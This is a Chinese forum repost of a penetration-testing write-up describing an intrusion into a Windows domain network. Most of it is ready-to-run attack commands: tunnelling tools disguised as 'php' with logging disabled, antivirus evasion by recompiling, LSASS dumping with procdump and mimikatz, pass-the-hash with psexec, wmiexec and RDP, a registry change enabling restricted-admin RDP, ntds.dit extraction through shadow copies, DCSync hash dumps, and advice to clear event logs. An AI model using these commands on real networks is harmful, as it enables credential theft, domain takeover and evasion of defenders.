安全矩阵

 找回密码
 立即注册
搜索
查看: 6527|回复: 0

菜菜鸡的初体验之内网渗透

[复制链接]

991

主题

1063

帖子

4315

积分

论坛元老

Rank: 8Rank: 8

积分
4315
发表于 2021-2-3 23:23:28 | 显示全部楼层 |阅读模式
原文链接:菜菜鸡的初体验之内网渗透

01 背景

菜菜鸡最近进入了一个内网,但是菜菜鸡之前没有打过内网,菜菜鸡表示有点不知所措,但是菜菜鸡的老大,大菜菜鸡表示不要慌,大家都没打过,边打边学,这样菜菜鸡就开始了第一次内网渗透之旅。
由于内网庞大,不可能一一介绍知识,所以本文主要介绍一些在本次内网渗透常用且好用的工具、方法和更快达到目标的思路

02 代理工具


不管在任何渗透中,好的代理工具是必不可少的,好的代理工具能让你在内网中七进七出,穿破对方的防线。

本篇幅有点小长,但可以关注一下里面的一些小trick或者优化。

PART ONE   NPS

1.简介
NPS是一款用go写的内网穿透工具,它的特性有:
  1. 1. 几乎支持所有协议
  2. 2. 支持内网http代理、内网socks5代理、p2p等
  3. 3. 简洁但功能强大的WEB管理界面
  4. 4. 支持服务端、客户端同时控制
  5. 5. 扩展功能强大
  6. 6. 全平台兼容,一键注册为服务
复制代码

基于以上特性,我们很乐意让它成为我们主要的代理工具。特别是存在web管理界面,使多个客户端管理变得十分轻松,及其存在webapi,可以让我们做一些自动化的事情。
2.配置
a. nps  
nps配置的主要关注的点在:
  1. # 是否开启http proxy 该功能类似于nginx实现https的处理
  2. http_proxy_ip=
  3. http_proxy_port=
  4. https_proxy_port=
  5. https_just_proxy=
  6. # bridge的类型和port 选一个自己想要的port即可
  7. bridge_type=tcp
  8. bridge_port=8888
  9. bridge_ip=0.0.0.0
  10. # 日志等级和记录 建议不记
  11. log_level=7
  12. log_path=/dev/null
  13. # 客户端连接使用vkey
  14. public_vkey=iamavkey
  15. # nps web管理端配置  建议配置web_host和web_base_url更加安全
  16. web_host= test.com
  17. web_username=user
  18. web_password=pass
  19. web_port = 12345
  20. web_ip=0.0.0.0
  21. web_base_url=/only_login
复制代码

# 端口复用

官方文档如下:
在一些严格的网络环境中,对端口的个数等限制较大,nps支持强大端口复用功能。将bridge_port、 http_proxy_port、 https_proxy_port 、web_port都设置为同一端口,也能正常使用。

使用时将需要复用的端口设置为与bridge_port一致即可,将自动识别。
如需将web管理的端口也复用,需要配置web_host也就是一个二级域名以便

除了以上配置,在实际使用中还需要关心客户端的心跳检测频率和超时检测:
客户端与服务端间会间隔5s相互发送延迟测量包,这个时间间隔不可修改。可修改延迟测量包丢包的次数,默认为60也就是5分钟都收不到一个延迟测量回包,则会断开客户端连接。值得注意的是需要客户端的socket关闭,才会进行重连,也就是当客户端无法收到服务端的fin包时,只有客户端自行关闭socket才行。也就是假如服务端设置为较低值,而客户端设置较高值,而此时服务端断开连接而客户端无法收到服务端的fin包,客户端也会继续等着直到触发客户端的超时设置。


在nps.conf或npc.conf中设置disconnect_timeout即可,客户端还可附带-disconnect_timeout=60参数启

如果觉得这个频率过快可以考虑修改源码来适配当前环境。

b. npc
npc启动方式可以分为两种,同时npc也支持注册到系统服务的形式进行安装和启动。
无文件形式启动
这种方式首先需要在web端新建一个客户端,

配置完了之后,点开该客户端旁边的+(-),可以展开(收回)客户端的配置详情,其中就有npc启动命令,



在这里分享一些小trick,如果在linux机器上以无文件形式启动,可以用以下命令伪装成php或java:

  1. mv npc php
  2. export PATH=.:$PATH
  3. # 环境变量设置vkey
  4. export NPC_SERVER_ADDR=1.1.1.1:8024
  5. export NPC_SERVER_VKEY=xxxxx
  6. php
复制代码

配置文件形式启动
  1. ./npc -config=npc配置文件路径
复制代码

具体配置可参考官方文档。


3.bug修复
在平时使用中,我们发现npc在windows中使用存在一些Bug:计划任务或其它非服务的system权限npc无法启动,经过debug发现是service这个依赖包存在问题,跟开发团队沟通他们建议自己先临时解决。这是一个非常重要的功能,因为如果我们想要在不保持某个用户登陆的情况下定时运行npc,就需要计划任务/ru SYSTEM选项


查看npc.go代码可以发现npc是支持不调用service就启动的,所以临时解决方案如下:

  1. s, err := service.New(prg, svcConfig)
  2. if err != nil {
  3. 修改成
  4. if false {
  5. 或者将if里代码提取出来,service代码去掉
复制代码

PART TWO  FRP

1.简介
frp 是一个专注于内网穿透的高性能的反向代理应用,支持 TCP、UDP、FRPHTTP、HTTPS 等多种协议。可以将内网服务以安全、便捷的方式通过具有公网 IP 节点的中转暴露到公网。
从功能上来讲与nps无太大的差别,所以这不赘述了,这里贴出项目地址和配置文档地址。

PART THREE  EarthWorm

1.简介
EW 是一套便携式的网络穿透工具,具有 SOCKS v5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。  

作者已经停止更新,但是网上还是可以找到源码。网上已经有很多关于ew的使用教程,这里不赘述了。  

看到这里可能很多读者又要问了,我已经有了npc、frp和chisel了,为啥还要用ew呢?那么我们考虑一个场景,对方内网有台机器不出网,并且我们只能通过这台机器到达目标网段,这个时候该怎么办?答案很简单,就是使用ew直接在该跳板机开启一个正向socks5监听端口,我们就可以通过该socks5到达目标网段。

2.静态免杀
我们在使用过程中经常遇到的问题是被杀软识别成恶意程序,但ew本身没有恶意行为,所以我们可以通过一些常用的过静态免杀的手法来过杀软: a. 重新编译 b. 取出不需要的字符常量 建议在本地先测试好再上生产环境,否则被识别了就前功尽弃。除此之外还需要考虑流量特征,这里就留给大家自行发挥了。

PART FOUR  invoke-proxy

1.简介
除了ew外,在windows还可以使用powershell脚本进行正向的socks5连接。Invoke-SocksProxy就实现了这个功能,当然它还可以进行反向socks5回弹,但是不推荐,或者需要修改源码使用。原因在于它的心跳在于5s,并且时不时会中断,需要修改和测试。

2.使用
在powershell运行

  1. Import-Module .\Invoke-SocksProxy.psm1;Invoke-SocksProxy -bindPort 1080
复制代码

即可在机器上监听1080端口并转发请求
03  域信息收集

PART ONE   前期信息收集


当我们获得一台内网普通机器的权限的时候,需要进行初步的信息收集,才可以确定我们下一步的目标。
假设菜菜鸡现在获取了一台在域内的windows权限,菜菜鸡该做什么呢?上网一搜,唰的一下,出来一堆:

1.获取当前所在域的名称
a.net config Workstation
  1. 计算机名                     \\DC
  2. 计算机全名                   DC.test.com
  3. 用户名                       Administrator
  4. 工作站域                     test
  5. 工作站域 DNS 名称            test.com
  6. 登录域                       test
  7. 命令成功完成。
复制代码

其中工作站域即是域名称

b.net time /domain
  1. net time /domain
  2. \\DC.test.com 的当前时间是 2021/1/1 20:29:16
复制代码

c.systeminfo
d.ipconfig /all

2.域内相关信息收集
a.基本信息查询
  1. # 查看域管
  2. net group "domain admins" /domain
  3. # 获得企业管理员列表
  4. net group "enterprise admins" /domain
  5. # 获得域控列表
  6. net group "domain controllers" /domain
  7. # 获得所有域用户列表
  8. net user /domain  > C:\Windows\Temp\user.txt
  9. # 获得所有域成员计算机列表
  10. net group "domain computers" /domain > C:\Windows\Temp\com.txt
  11. # 获取所有的组,这一步其实是非常重要的,因为专业运维都会分组,并且命名规范,所以如果想要精确打击目标,比如财务、hr、管理员组,就可以直奔目标而去
  12. net group /domain > C:\Windows\Temp\group.txt
  13. # 获取域信任信息
  14. nltest /domain_trusts
  15. # 查询域所有spn,也可以查到dc及其主机名,这个命令在搜集计算机分组上也很有用
  16. setspn -T target.com -Q */* > C:\Windows\Temp\spn.txt
  17. # nslookup 查询该域所有域控及对应主机名 为CVE-2020-1472 ZeroLogon做准备
  18. nslookup -type=all _ldap._tcp.dc._msdcs.test.com
  19. _ldap._tcp.dc._msdcs.test.com     SRV service loc
  20.           priority       = 0
  21.           weight         = 100
  22.           port           = 389
  23.           svr hostname   = dc.test.com
  24. dc.test.com       internet address = 1.1.1.1
  25. # 一般来讲,域内DNS跟域控会在一起,所以可以通过nslookup获取dns服务器,不过具有局限性,因为域内通常有多个域控服务器
  26. nslookup google.com
复制代码

b. 抓取本机hash

菜菜鸡这个时候已经获取了域的基本信息,但是还是有点迷茫,接下来能干什么?菜菜鸡想起了之前在某大厂实习的时候,用的也是域,菜菜鸡用自己的账号本地登录过其它机器,那远程登陆的权限是不是也有?但是通过一番询问和查证,得到的结果是一般都不行。但是域管就可以,所以就开始了找域管账号密码之旅。

由于菜菜鸡进入的是一个sharepoint系统,很大概率本机保存着某些域管的凭据,所以抓取本地hash就成了我们的首要目标。

抓取本地hash网上也有很多文章了,这里介绍一种不上传mimikatz抓取hash的方式,可以有效的规避杀软:
1). 上传procdump64.exe[6] ,procdump是微软官方提供的工具,所以不用担心免杀问题;

2). 运行 procdump64.exe -accepteula -64 -ma lsass.exe lsass.dmp;
3). 下载lsass.dmp;
4). 在本地运行mimikatz
  1. mimikatz # sekurlsa::minidump lsass.dmp
  2. mimikatz # sekurlsa::logonPasswords ful
复制代码

幸运的是,我们确实拿到了域管的hash,并且还是明文的,虽然不是明文也无所谓(后面才知道)即可看到所有本地保存的hash


PART TWO  横向扩展执行命令常用方法

当我们拿到域管密码的时候,如果不想进行远程登录但想在目标机器上执行命令,可以采用以下几种方法:

1.psexec

psexec是微软官方的PsTools里的一款工具,利用445或者139端口,开启一个交互式的命令控制台。

psexec主要通过admin$和ipc$共享,将psexesvc.exe文件上传,然后通过用于启动服务二进制文件的服务控制管理器(sc),在目标主机上创建命名管道,并将该管道用于输入和输出操作,就可以获得一个交互式的命令控制台。

原理图如下:


详细分析可参考这篇文章[7]。
用法:
  1. # -s 为Run the remote process in the System account
  2. PsExec.exe \\xxx.xxx.xxx.xxx -u domain.com\user_name -p password -s cmd
复制代码



同时要考虑psexec会在对方机器留下的痕迹:

a. PSEXESVC 服务将会安装在远程系统中,如果是断网退出,psexec服务和psexec.exe不会被删除;

b. 生成 Event 4697、7045、4672 这3种事件日志,主要是内容是psexec服务启动和凭据认证。


2.wmic
wmic是一款命令行工具,不但可以管理本地计算机,还可以管理远程计算机。缺点是不会进行回显,所以可以结合写文件和smb读文件进行命令执行。
用法:
  1. python3 wmiexec.py test.com/Administrator@xxx.xxx.xxx.xxx -hashes xxxx:xxx(LMHASH:NTHASH)
复制代码

wmic在平常渗透中用的比较少,但是在某些特定场景可以使用,比如需要特定用户的权限去执行命令。

3.wmiexec
wmiexec.py是impacket[8]里的一个组件,类似于smbexec的方法,但是通过WMI执行命令,所以它补足了wmic不能回显的缺点。
用法:
  1. python3 wmiexec.py test.com/Administrator@xxx.xxx.xxx.xxx -hashes xxxx:xxx(LMHASH:NTHASH)
复制代码



看到这里菜菜鸡不禁思考了起来,wmiexec与psexec区别到底是啥呢?在实践环境中该用哪个呢?

我们可以重新梳理下它们的流程以及要利用到的端口:
psexec:
1. 提供凭据,SMB验证
2. 使用IPC$和admin$共享上传psexec.exe
3. 通过远程调用创建服务并启动
4. 用命令管道进行输入输出处理
5. 结束后删除psexec.exe和服务
依赖于445端口,可取得system权
wmiexec:
1. 提供凭据,SMB验证
2. 提供凭据,建立DCOM连接
3. 输入命令
4. 对命令进行拼接处理(将命令结果输出到ADMIN$),并利用建立好的DCOM连接和__win32Process执行命令
5. 取回结果并显示,然后删除结果文件(OUTPUT_FILENAME = '__' + str(time.time()))
依赖于135、445端口,不需要system权限,但必须要是admin权
综上,wmiexec与psexec相比:

优点:
a. 无exe落地;
b. 不会在对方的机器上启动服务,只会留下认证日志。

缺点
a. 需要135端口;
b. 会有输出结果文件落地;
c. 经过流量抓包,发现命令是明文传输的。

所以如果在流量审查比较严格和135端口不通的环境中,菜菜鸡会考虑用psexec,如果在日志审查严格的环境中,菜菜鸡会考虑使用wmiexec。
除此之外,还要考虑杀软、防火墙和域策略,菜菜鸡还没测过在杀软环境下psexec和wmiexec的表现,所以任重而道远。

4.pth
pth(pass the hash)是一种利用NTLM哈希来向远程服务器或服务进行身份验证,从而绕过使用明文密码限制的技术。根据wikipedia的介绍:

在使用NTLM身份验证的系统或服务上,用户密码永远不会以明文形式通过网络发送。相反,它们像域控制器一样作为哈希提供给请求系统,作为对质询-响应身份验证方案的响应。

本机Windows应用程序向用户询问明文密码,然后调用LsaLogonUser之类的API,将该密码转换为一个或两个哈希值(LM或NT哈希),然后在NTLM身份验证期间将其发送到远程服务器。对这种机制的分析表明,成功完成网络身份验证不需要明文密码,只需要哈希即可。

如果攻击者拥有用户密码的哈希值,则无需强行使用明文密码;他们可以简单地使用他们获取的任意用户帐户的哈希值来针对远程系统进行身份验证并模拟该用户。换句话说,从攻击者的角度来看,哈希在功能上等同于生成它们的原始密码。

可以大致看出pth是利用NTLM认证机制的特性进行哈希传递,这会使在渗透场景中,使用NTLM认证的任何服务或服务器,例如SMB、WEB应用等,变得十分脆弱。

废话不多说,直接举几个栗子:



下面都是使用mimikatz来进行pth攻击的例子

a. psexec
  1. privilege::debug
  2. sekurlsa::pth /user:user /domain:test /ntlm:xxxxxxxx
  3. PsExec.exe /accepteula \\192.168.1.1 cmd.exe
复制代码

b. wmiexec
wmiexec就是用的hash

  1. python3 wmiexec.py test.com/Administrator@xxx.xxx.xxx.xxx -hashes xxxx:xxx(LMHASH:NTHASH)
复制代码

c. rdp
  1. privilege::debug
  2. sekurlsa::pth /user:<user name> /domain:<domain name> /ntlm:<the user's ntlm hash> /run:"mstsc.exe /restrictedadmin"
复制代码

然后输入地址直接连接就可以了。这个默认是不开的,需要开启策略:
  1. REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f
复制代码

如果有特定用户RDP需求可以通过psexec上去开启策略然后RDP上去。


d. web application
如果使用了NTLM认证的网站,例如在IIS配置了NTLM认证,也可以使用pth攻击,具体可以查看这篇文章[9]。

  1. privilege::debug
  2. sekurlsa::pth /user:pth /ntlm:57f5f9f45e6783753407ae3a8b13b032 /domain:TEST /run:cmd.exe
复制代码
在弹出的命令行执行
  1. "C:\Program Files\internet explorer\iexplore.exe"
复制代码

在IE-Internet选项-安全-本地Internet-站点-高级,添加目标站点到区域,




然后访问目标网站即可完成NTLM认证。
到现在为止,菜菜鸡已经有了意大利炮,可以向域控发起攻击了。


PART THREE  中期信息收集


现在菜菜鸡已经登陆上域控了,那么菜菜鸡下一步该做什么呢?这里不禁要思考,域控有什么?通常来说,域控通常会有:

1. 域所有用户的hash和域组织结构
2. DNS
3. 可能保存其它域管的明文密码
4. 域认证
我们首要目标是域所有用户的hash和域组织结构,其次再是DNS和域认证日志

1.ntds.dit导出
Ntds.dit是主要的AD数据库,包括有关域用户,组和组成员身份的信息。它还包括域中所有用户的密码哈希值。为了进一步保护密码哈希值,使用存储在SYSTEM注册表配置单元中的密钥对这些哈希值进行加密。

但通常我们没办法直接复制它,直接复制会提示"文件正在使用",所以我们可以通过Shadow Copy来复制它。

参考[10],可以知道系统自带两个命令:ntdsutil和vssadmin,通过这两个命令可以将ntds.dit导出,不过会产生Event ID为7036和98的日志,注意清除,下面以ntdsutil为例:

a. 创建快照
  1. ntdsutil snapshot "activate instance ntds" create quit quit
复制代码

该命令会返回快照的guid。

b. 挂载快照
  1. ntdsutil snapshot "mount {88663f87-3791-4ee4-8fe6-d5172fc85748}" quit quit
复制代码

该命令会返回挂载到的位置。

c. 复制ntds.dit
  1. copy C:\$SNAP_202101181507_VOLUMEC$\windows\NTDS\ntds.dit c:\ntds.dit
复制代码
d. 卸载快照

  1. ntdsutil snapshot  "unmount {88663f87-3791-4ee4-8fe6-d5172fc85748}" quit quit
复制代码
e. 删除快照
  1. ntdsutil snapshot  "delete {88663f87-3791-4ee4-8fe6-d5172fc85748}" quit quit
复制代码
f. 查看是否完成卸载和删除
  1. ntdsutil snapshot "List All" quit quit
  2. ntdsutil snapshot "List Mounted" quit quit
复制代码

​然后再运行:
  1. reg save HKLM\SYSTEM sys.hiv
复制代码

将sys.hiv拖回来,配合ntds.dit就可以将数据库给解出。

除此之外,还有很多种利用Shadow Copy的方法,但原理都大同小异。

2.域hash导出
域hash导出的方法有很多种,下面举三个例子:

a. ntds.dit
在上文中,我们已经获取到了ntds.dit和HKLM\SYSTEM注册表,利用Impacket的secretsdump.py就可以解出:

  1. python secretsdump.py -ntds ntds.dit -system registry/SYSTEM LOCAL --outputfile hash.txt
复制代码

b. mimikatz

利用mimikatz也可以导出域的hash,并且不一定要在域控上,但权限要够:
  1. mimikatz.exe privilege::debug "lsadump::dcsync /domain:test.com /all /csv" exit
复制代码

c. secretsdump.py

secretsdump.py是Impacket里的一个脚本,跟wmiexec一样可以用hash认证:
  1. python secretsdump.py test.com/administrator@10.x.x.x -just-dc -hashes xxxxx:xxxxx
复制代码

3.DNS记录导出
在域环境中,域控通常也承担DNS的职能,所以我们可以直接从域控上导出该域控管理的DNS记录。
  1. # 枚举出所有区域,本域或域林中其它区域管理的区域
  2. Dnscmd DC.test.com /EnumZones
  3. # 更详细的列出某个域名的DNS记录,该域名得是该域管理下的
  4. Dnscmd . /ZonePrint test.com
  5. # 简洁的列出某个域名的DNS记录
  6. Dnscmd . /EnumRecords test.com .
复制代码
下面给出一个网上找的powershell导出Dns的脚本,这个导出的DNS记录也比较详细:

  1. # powershell 导dns
  2. $Zones = @(Get-DnsServerZone)
  3. ForEach ($Zone in $Zones) {
  4. Write-Host "`n$($Zone.ZoneName)" -ForegroundColor "Green"
  5. $Zone | Get-DnsServerResourceRecord |fl
  6. }
复制代码

如果是不在域控的情况下,也可以利用dnscmd远程导dns记录,不过要借助mimikatz的pth功能。


4.域认证记录导出
利用命令:

  1. wevtutil qe security /q:"Event[System[(EventID=4624 or EventID=4768 or EventID=4776)]]" /f:text /rd:true > C:\Windows\temp\Evtlogon.txt
复制代码

将经过该域控认证的认证日志导出,其中包含了一些用户名和被登陆机器的IP。


PART FOUR  后期信息收集

在经过中期信息收集之后,后期的扩展目标就不是单纯的某台机器,而是人与文档,可以尝试着根据在域控收集到的组织结构和域认证记录找到某个部门的IP段从而进行定向攻击,提升效率。总而言之还是需要大量的信息收集才能达到目的,最终菜菜鸡也通过翻文档和翻机器找到想要的东西,完成了域的渗透。


PART FIVE  总结


在真实环境中,域的复杂程度取决于域的大小、运维人员的专业程度,有时候运维人员不专业,网段不隔离,没有防火墙,没有流量审计,会让整个渗透变得十分简单,但是如果做得十分专业,网段隔离,有防火墙,有流量审计等,会让整个渗透变得十分困难,这个时候就十分考验菜菜鸡的对抗能力了,但是借助好的方法和工具往往能如虎添翼,让敌人措手不及。
References[1] NPS: https://github.com/ehang-io/nps
[2] 官方文档: https://ehang-io.github.io/nps/#/use
[3] 项目地址: https://github.com/fatedier/frp/
[4] 配置文档地址: https://gofrp.org/docs/examples/
[5] Invoke-SocksProxy: https://github.com/p3nt4/Invoke-SocksProxy
[6] procdump64.exe: https://docs.microsoft.com/en-us/sysinternals/downloads/procdump
[7] url: https://rcoil.me/2019/08/%E3%80%90%E7%9F%A5%E8%AF%86%E5%9B%9E%E9%A1%BE%E3%80%91%E6%B7%B1%E5%85%A5%E4%BA%86%E8%A7%A3%20PsExec/
[8] impacket: https://github.com/SecureAuthCorp/impacket/blob/master/examples/wmiexec.py
[9] url: https://labs.f-secure.com/blog/pth-attacks-against-ntlm-authenticated-web-applications/
[10] url: https://uknowsec.cn/posts/notes/%E5%9F%9F%E6%B8%97%E9%80%8F-%E8%8E%B7%E5%8F%96NTDS.dit.html


















回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-28 20:41 , Processed in 0.015413 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表